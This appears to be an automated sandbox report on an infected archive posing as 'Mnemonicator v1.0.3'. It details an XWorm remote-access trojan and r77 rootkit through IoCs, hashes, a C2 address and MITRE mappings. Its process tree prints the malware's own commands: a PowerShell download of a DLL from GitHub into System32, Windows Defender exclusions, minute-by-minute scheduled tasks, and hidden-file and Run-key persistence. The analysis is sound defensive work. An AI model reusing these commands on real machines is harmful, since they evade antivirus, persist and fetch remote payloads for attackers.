r77 | 32cf3a092e09e4609675078976e052066c3fe7b42128a89b87b2473a2f51e42f

Analysis

max time kernel
133s
max time network
135s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-01-2025 05:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mnemonicator v1.0.3 (infected).7z
Size

37.5MB
MD5

e18d698e01dbf05dc08822d787e825e5
SHA1

1ea9a22d179d21a280a5de8b5ead6f3bae52c8d2
SHA256

32cf3a092e09e4609675078976e052066c3fe7b42128a89b87b2473a2f51e42f
SHA512

654212ffa8bc6e46b3f8db23a0bfd5574193f18807c63f29f15c0bbfd86714c064fff6f9ca8a2d88c547d48c33f73825d9f95ca2ac2707c8f9278968877106f2
SSDEEP

786432:f68J6Hf9bldLadW0mnN1b2lUJVZh+evb6qylASOL:yddLadgrZQ46qylASg

Score

10^/10

r77 xworm discovery evasion execution persistence privilege_escalation pyinstaller rat rootkit trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/NGROKC/CTC/raw/main/CTC64.dll

Extracted

Family

xworm

SLL.casacam.net:4444

Attributes

Install_directory
%ProgramData%
install_file
systempu.exe

Signatures

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral1/files/0x0008000000024180-2293.dat	family_xworm
behavioral1/files/0x0007000000024181-2303.dat	family_xworm
behavioral1/memory/1472-2330-0x0000000000F40000-0x0000000000F66000-memory.dmp	family_xworm
behavioral1/memory/1700-2331-0x0000000000870000-0x0000000000888000-memory.dmp	family_xworm

R77 family
r77
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
r77
r77 is an open-source, userland rootkit.
rootkit r77

r77 rootkit payload 1 IoCs

Detects the payload of the r77 rootkit.

resource	yara_rule
behavioral1/files/0x000b0000000241a5-2786.dat	r77_payload

Blocklisted process makes network request 2 IoCs

flow	pid	Process
43	2936	powershell.exe
48	2936	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1368	powershell.exe
4336	powershell.exe
3672	powershell.exe
3196	powershell.exe
2936	powershell.exe

Downloads MZ/PE file
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
404	attrib.exe
2120	attrib.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	$77-System32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Mnemonicator v1.0.3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Mnemonicator v1.0.3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	BHS100000.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	winlogoc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	S444.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	Mnemonicator v1.0.3.exe

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe	$77-System32.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe	$77-System32.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk	winlogoc.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk	winlogoc.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systempu.lnk	BHS100000.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systempu.lnk	BHS100000.exe

Executes dropped EXE 22 IoCs

pid	Process
1972	Mnemonicator v1.0.3.exe
1472	BHS100000.exe
1700	winlogoc.exe
1740	S444.exe
2832	Mnemonicator1.exe
4252	BaseUtils.exe
2276	BaseUtils.exe
1080	$77-System32.exe
1972	Mnemonicator v1.0.3.exe
2236	BHS100000.exe
3428	winlogoc.exe
4456	S444.exe
3444	Mnemonicator1.exe
3860	Mnemonicator v1.0.3.exe
2716	BHS100000.exe
3004	winlogoc.exe
1696	S444.exe
2524	Mnemonicator1.exe
3720	BaseUtils.exe
4544	BaseUtils.exe
4832	systempu.exe
3196	Interrupi.exe

Loads dropped DLL 44 IoCs

pid	Process
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
2276	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4544	BaseUtils.exe
4832	systempu.exe
3196	Interrupi.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Interrupi = "C:\\Users\\Admin\\AppData\\Local\\Interrupi.exe"	winlogoc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\systempu = "C:\\ProgramData\\systempu.exe"	BHS100000.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe"	$77-System32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe"	$77-System32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
47	raw.githubusercontent.com
48	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ip-api.com

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000024129-2374.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77-System32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mnemonicator v1.0.3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S444.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mnemonicator v1.0.3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S444.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	S444.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Mnemonicator v1.0.3.exe

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral1/files/0x000700000002417b-2284.dat	nsis_installer_1
behavioral1/files/0x000700000002417b-2284.dat	nsis_installer_2

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
688	schtasks.exe
3368	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
1700	winlogoc.exe
1472	BHS100000.exe
1080	$77-System32.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1368	powershell.exe
1368	powershell.exe
4336	powershell.exe
4336	powershell.exe
3672	powershell.exe
3672	powershell.exe
3196	powershell.exe
3196	powershell.exe
3196	powershell.exe
1472	BHS100000.exe
2936	powershell.exe
2936	powershell.exe
2936	powershell.exe
4832	systempu.exe
4832	systempu.exe
3196	Interrupi.exe
3196	Interrupi.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1752	7zFM.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeRestorePrivilege	1752	7zFM.exe
Token: 35	1752	7zFM.exe
Token: SeSecurityPrivilege	1752	7zFM.exe
Token: SeDebugPrivilege	1472	BHS100000.exe
Token: SeDebugPrivilege	1700	winlogoc.exe
Token: SeDebugPrivilege	1368	powershell.exe
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	1700	winlogoc.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	1472	BHS100000.exe
Token: SeDebugPrivilege	3428	winlogoc.exe
Token: SeDebugPrivilege	2236	BHS100000.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2716	BHS100000.exe
Token: SeDebugPrivilege	3004	winlogoc.exe
Token: SeDebugPrivilege	1080	$77-System32.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe
Token: SeDebugPrivilege	4832	systempu.exe
Token: SeDebugPrivilege	3196	Interrupi.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe
Token: 33	1080	$77-System32.exe
Token: SeIncBasePriorityPrivilege	1080	$77-System32.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1752	7zFM.exe
1752	7zFM.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1972	Mnemonicator v1.0.3.exe
1472	BHS100000.exe
1972	Mnemonicator v1.0.3.exe
3860	Mnemonicator v1.0.3.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1972 wrote to memory of 1472	1972	Mnemonicator v1.0.3.exe	91
PID 1972 wrote to memory of 1472	1972	Mnemonicator v1.0.3.exe	91
PID 1972 wrote to memory of 1700	1972	Mnemonicator v1.0.3.exe	92
PID 1972 wrote to memory of 1700	1972	Mnemonicator v1.0.3.exe	92
PID 1972 wrote to memory of 1740	1972	Mnemonicator v1.0.3.exe	93
PID 1972 wrote to memory of 1740	1972	Mnemonicator v1.0.3.exe	93
PID 1972 wrote to memory of 1740	1972	Mnemonicator v1.0.3.exe	93
PID 1972 wrote to memory of 2832	1972	Mnemonicator v1.0.3.exe	94
PID 1972 wrote to memory of 2832	1972	Mnemonicator v1.0.3.exe	94
PID 1472 wrote to memory of 1368	1472	BHS100000.exe	97
PID 1472 wrote to memory of 1368	1472	BHS100000.exe	97
PID 1700 wrote to memory of 688	1700	winlogoc.exe	99
PID 1700 wrote to memory of 688	1700	winlogoc.exe	99
PID 1472 wrote to memory of 4336	1472	BHS100000.exe	101
PID 1472 wrote to memory of 4336	1472	BHS100000.exe	101
PID 1472 wrote to memory of 3672	1472	BHS100000.exe	103
PID 1472 wrote to memory of 3672	1472	BHS100000.exe	103
PID 1472 wrote to memory of 3196	1472	BHS100000.exe	106
PID 1472 wrote to memory of 3196	1472	BHS100000.exe	106
PID 1740 wrote to memory of 4184	1740	S444.exe	108
PID 1740 wrote to memory of 4184	1740	S444.exe	108
PID 1740 wrote to memory of 4184	1740	S444.exe	108
PID 4252 wrote to memory of 2276	4252	BaseUtils.exe	110
PID 4252 wrote to memory of 2276	4252	BaseUtils.exe	110
PID 4184 wrote to memory of 404	4184	cmd.exe	111
PID 4184 wrote to memory of 404	4184	cmd.exe	111
PID 4184 wrote to memory of 404	4184	cmd.exe	111
PID 2276 wrote to memory of 2092	2276	BaseUtils.exe	112
PID 2276 wrote to memory of 2092	2276	BaseUtils.exe	112
PID 1740 wrote to memory of 1080	1740	S444.exe	114
PID 1740 wrote to memory of 1080	1740	S444.exe	114
PID 1740 wrote to memory of 1080	1740	S444.exe	114
PID 1472 wrote to memory of 3368	1472	BHS100000.exe	115
PID 1472 wrote to memory of 3368	1472	BHS100000.exe	115
PID 1972 wrote to memory of 2236	1972	Mnemonicator v1.0.3.exe	118
PID 1972 wrote to memory of 2236	1972	Mnemonicator v1.0.3.exe	118
PID 1972 wrote to memory of 3428	1972	Mnemonicator v1.0.3.exe	119
PID 1972 wrote to memory of 3428	1972	Mnemonicator v1.0.3.exe	119
PID 1972 wrote to memory of 4456	1972	Mnemonicator v1.0.3.exe	120
PID 1972 wrote to memory of 4456	1972	Mnemonicator v1.0.3.exe	120
PID 1972 wrote to memory of 4456	1972	Mnemonicator v1.0.3.exe	120
PID 1972 wrote to memory of 3444	1972	Mnemonicator v1.0.3.exe	121
PID 1972 wrote to memory of 3444	1972	Mnemonicator v1.0.3.exe	121
PID 1080 wrote to memory of 324	1080	$77-System32.exe	123
PID 1080 wrote to memory of 324	1080	$77-System32.exe	123
PID 1080 wrote to memory of 324	1080	$77-System32.exe	123
PID 324 wrote to memory of 2120	324	cmd.exe	125
PID 324 wrote to memory of 2120	324	cmd.exe	125
PID 324 wrote to memory of 2120	324	cmd.exe	125
PID 1080 wrote to memory of 2044	1080	$77-System32.exe	126
PID 1080 wrote to memory of 2044	1080	$77-System32.exe	126
PID 1080 wrote to memory of 2044	1080	$77-System32.exe	126
PID 2044 wrote to memory of 2936	2044	cmd.exe	128
PID 2044 wrote to memory of 2936	2044	cmd.exe	128
PID 2044 wrote to memory of 2936	2044	cmd.exe	128
PID 3860 wrote to memory of 2716	3860	Mnemonicator v1.0.3.exe	131
PID 3860 wrote to memory of 2716	3860	Mnemonicator v1.0.3.exe	131
PID 3860 wrote to memory of 3004	3860	Mnemonicator v1.0.3.exe	132
PID 3860 wrote to memory of 3004	3860	Mnemonicator v1.0.3.exe	132
PID 3860 wrote to memory of 1696	3860	Mnemonicator v1.0.3.exe	133
PID 3860 wrote to memory of 1696	3860	Mnemonicator v1.0.3.exe	133
PID 3860 wrote to memory of 1696	3860	Mnemonicator v1.0.3.exe	133
PID 3860 wrote to memory of 2524	3860	Mnemonicator v1.0.3.exe	134
PID 3860 wrote to memory of 2524	3860	Mnemonicator v1.0.3.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
404	attrib.exe
2120	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Mnemonicator v1.0.3 (infected).7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1752

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3008

C:\Users\Admin\Desktop\Mnemonicator v1.0.3\Mnemonicator v1.0.3.exe
"C:\Users\Admin\Desktop\Mnemonicator v1.0.3\Mnemonicator v1.0.3.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Users\Admin\AppData\Local\Temp\BHS100000.exe
  "C:\Users\Admin\AppData\Local\Temp\BHS100000.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BHS100000.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BHS100000.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\systempu.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3672
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systempu.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3196
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "systempu" /tr "C:\ProgramData\systempu.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3368
- C:\Users\Admin\AppData\Local\Temp\winlogoc.exe
  "C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Interrupi" /tr "C:\Users\Admin\AppData\Local\Interrupi.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:688
- C:\Users\Admin\AppData\Local\Temp\S444.exe
  "C:\Users\Admin\AppData\Local\Temp\S444.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4184
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\S444.exe"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:404
- - C:\System32\$77-System32.exe
    "C:\System32\$77-System32.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c attrib +s +h +r "C:\System32\$77-System32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:324
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h +r "C:\System32\$77-System32.exe"
        5⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2120
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Rot.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2044
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/CTC64.dll','\System32\r77-x64.dll');exit
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
- C:\Users\Admin\AppData\Local\Temp\Mnemonicator1.exe
  "C:\Users\Admin\AppData\Local\Temp\Mnemonicator1.exe"
  2⤵
  - Executes dropped EXE
  PID:2832

C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe
"C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4252
- C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe
  "C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:2092

C:\Users\Admin\Desktop\Mnemonicator v1.0.3\Mnemonicator v1.0.3.exe
"C:\Users\Admin\Desktop\Mnemonicator v1.0.3\Mnemonicator v1.0.3.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Users\Admin\AppData\Local\Temp\BHS100000.exe
  "C:\Users\Admin\AppData\Local\Temp\BHS100000.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2236
- C:\Users\Admin\AppData\Local\Temp\winlogoc.exe
  "C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3428
- C:\Users\Admin\AppData\Local\Temp\S444.exe
  "C:\Users\Admin\AppData\Local\Temp\S444.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4456
- C:\Users\Admin\AppData\Local\Temp\Mnemonicator1.exe
  "C:\Users\Admin\AppData\Local\Temp\Mnemonicator1.exe"
  2⤵
  - Executes dropped EXE
  PID:3444

C:\Users\Admin\Desktop\Mnemonicator v1.0.3\Mnemonicator v1.0.3.exe
"C:\Users\Admin\Desktop\Mnemonicator v1.0.3\Mnemonicator v1.0.3.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3860
- C:\Users\Admin\AppData\Local\Temp\BHS100000.exe
  "C:\Users\Admin\AppData\Local\Temp\BHS100000.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2716
- C:\Users\Admin\AppData\Local\Temp\winlogoc.exe
  "C:\Users\Admin\AppData\Local\Temp\winlogoc.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3004
- C:\Users\Admin\AppData\Local\Temp\S444.exe
  "C:\Users\Admin\AppData\Local\Temp\S444.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1696
- C:\Users\Admin\AppData\Local\Temp\Mnemonicator1.exe
  "C:\Users\Admin\AppData\Local\Temp\Mnemonicator1.exe"
  2⤵
  - Executes dropped EXE
  PID:2524

C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe
"C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe"
1⤵
- Executes dropped EXE
PID:3720
- C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe
  "C:\Users\Admin\Desktop\Mnemonicator v1.0.3\BaseUtils.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ver"
    3⤵
    PID:1504

C:\ProgramData\systempu.exe
C:\ProgramData\systempu.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832

C:\Users\Admin\AppData\Local\Interrupi.exe
C:\Users\Admin\AppData\Local\Interrupi.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
